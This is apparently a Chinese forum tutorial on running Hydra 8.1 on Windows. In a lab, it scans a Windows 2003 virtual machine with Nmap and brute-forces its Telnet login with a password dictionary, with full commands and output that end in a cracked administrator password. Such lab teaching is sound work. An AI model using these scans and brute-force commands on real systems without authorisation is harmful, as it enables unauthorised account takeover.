简述

hydra自不必多说，爆破神奇九头蛇，而很多好兄弟不知道怎么在windows上使用hydra，这边我提供一个完美适配windows系统的版本最稳定的hydra——hydra 8.1

使用概述

回复本贴
下载hydra，并解压
在hydra.exe所在目录下进入命令行
开始使用

使用示例

制作靶机

打开一台win2003，仅主机模式接到虚拟网卡VMnet1

仅主机模式不能上因特网，是一个封闭的内网环境，且可以随便配IP，只要在同一网段，两台主机就可以通信
打开services.msc，打开服务Telnet——TCP:23
桌面=>右键我的电脑=>属性=>远程=>启用远程桌面——TCP:3389
我的电脑=>光驱=>安装可选的Windows组件=>应用程序服务器=>IIS=>FTP——TCP:21
打开IIS，配置默认的FTP站点。右击属性=>安全账户=>取消匿名访问
新建一个用户，我们将用它做为目标用户
```
net user test testtest /add
```

信息收集与Nmap

主机探测：是指确定目标主机是否存活
端口扫描：寻找在线主机所开放的端口，并且在端口上所运行的服务。甚至可以进一步确定目标主机操作系统类型和更详细的信息

下面我们介绍一个号称“扫描之王”的软件——Nmap，下面是重要常用参数：

参数	功能
-sP	ping扫描
-p	指定端口范围
-sV	服务版本探测
-O	启用操作系统探测
-A	全面扫描
-oN	保存txt

描扫192.168.241.0/24网段在线主机

C:\Users\Administrator&gt;nmap -sP 192.168.241.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:06 ?D1ú±ê×?ê±??
Stats: 0:00:22 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 255 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
MAC Address: 00:0C:29:E9:24:06 (VMware)
Nmap scan report for 192.168.241.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E0:96:74 (VMware)
Nmap scan report for 192.168.241.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 22.80 seconds

探测192.168.241.128的操作系统等信息

C:\Users\Administrator&gt;nmap -O 192.168.241.128
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:09 ?D1ú±ê×?ê±??
Stats: 0:00:18 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.241.128
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1048/tcp open  neod2
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:E9:24:06 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.75 seconds

探测192.168.241.128的操作系统等信息并保存当D:\baogao.txt

C:\Users\Administrator&gt;nmap -O 192.168.241.128 -oN d:\baogao.txt

探测192.168.241.128指定端口

C:\Users\Administrator&gt;nmap -p 21,23,80 192.168.241.128
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:12 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
PORT   STATE  SERVICE
21/tcp open   ftp
23/tcp open   telnet
80/tcp closed http
MAC Address: 00:0C:29:E9:24:06 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.14 seconds

探测192.168.241.128指定端口，同时探测哪个服务版本

C:\Users\Administrator&gt;nmap -p 21,23 192.168.241.128 -sV
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:15 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet  Microsoft Windows XP telnetd
MAC Address: 00:0C:29:E9:24:06 (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.06 seconds

爆破与hydra

信息扫描完成后，我们便可以开始爆破。

这里我们用到的是hydra九头蛇———8.1版本（比较适合在windows下运行）

参数	功能
-R	继续从上一次进度接着破解
-S	采用SSL链接
-s	指定非默认端口
-l	指定破解的用户，对特定用户破解
-L	指定用户名字典
-p	指定密码破解
-P	指定密码字典
-e	n：空密码试探，s：使用指定用户和密码试探
-C	使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数
M	指定目标列表文件一行一条
-o	指定结果输出文件
-f	在使用-M参数以后，找到第一对登录名或者密码的时候中止破解
-t	同时运行的线程数，默认为16
-w	设置最大超时的时间，单位秒，默认是30s
-v /-V	显示详细过程

爆破协议可以为telnet、rdp、smb（即CIFS445端口共享）、ftp、ssh、mysql。

建议配置环境变量，可以直接调用hydra

在真机里，D盘下创建一个txt，这就是我们的密码字典——pass.txt，内容键入n行密码
然后打开控制台，键入：
```
hydra -l administrator -P d:\pass.txt 192.168.241.128 telnet
```
意为以用户为administrator和pass.txt字典结合对该IP的telnet服务进行暴力破解

破解成功

C:\&gt;hydra -l administrator -P d:\pass.txt 192.168.241.128 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-11-08 21:05:03
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 48 login tries (l:1/p:48), ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.241.128   login: administrator   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-11-08 21:05:28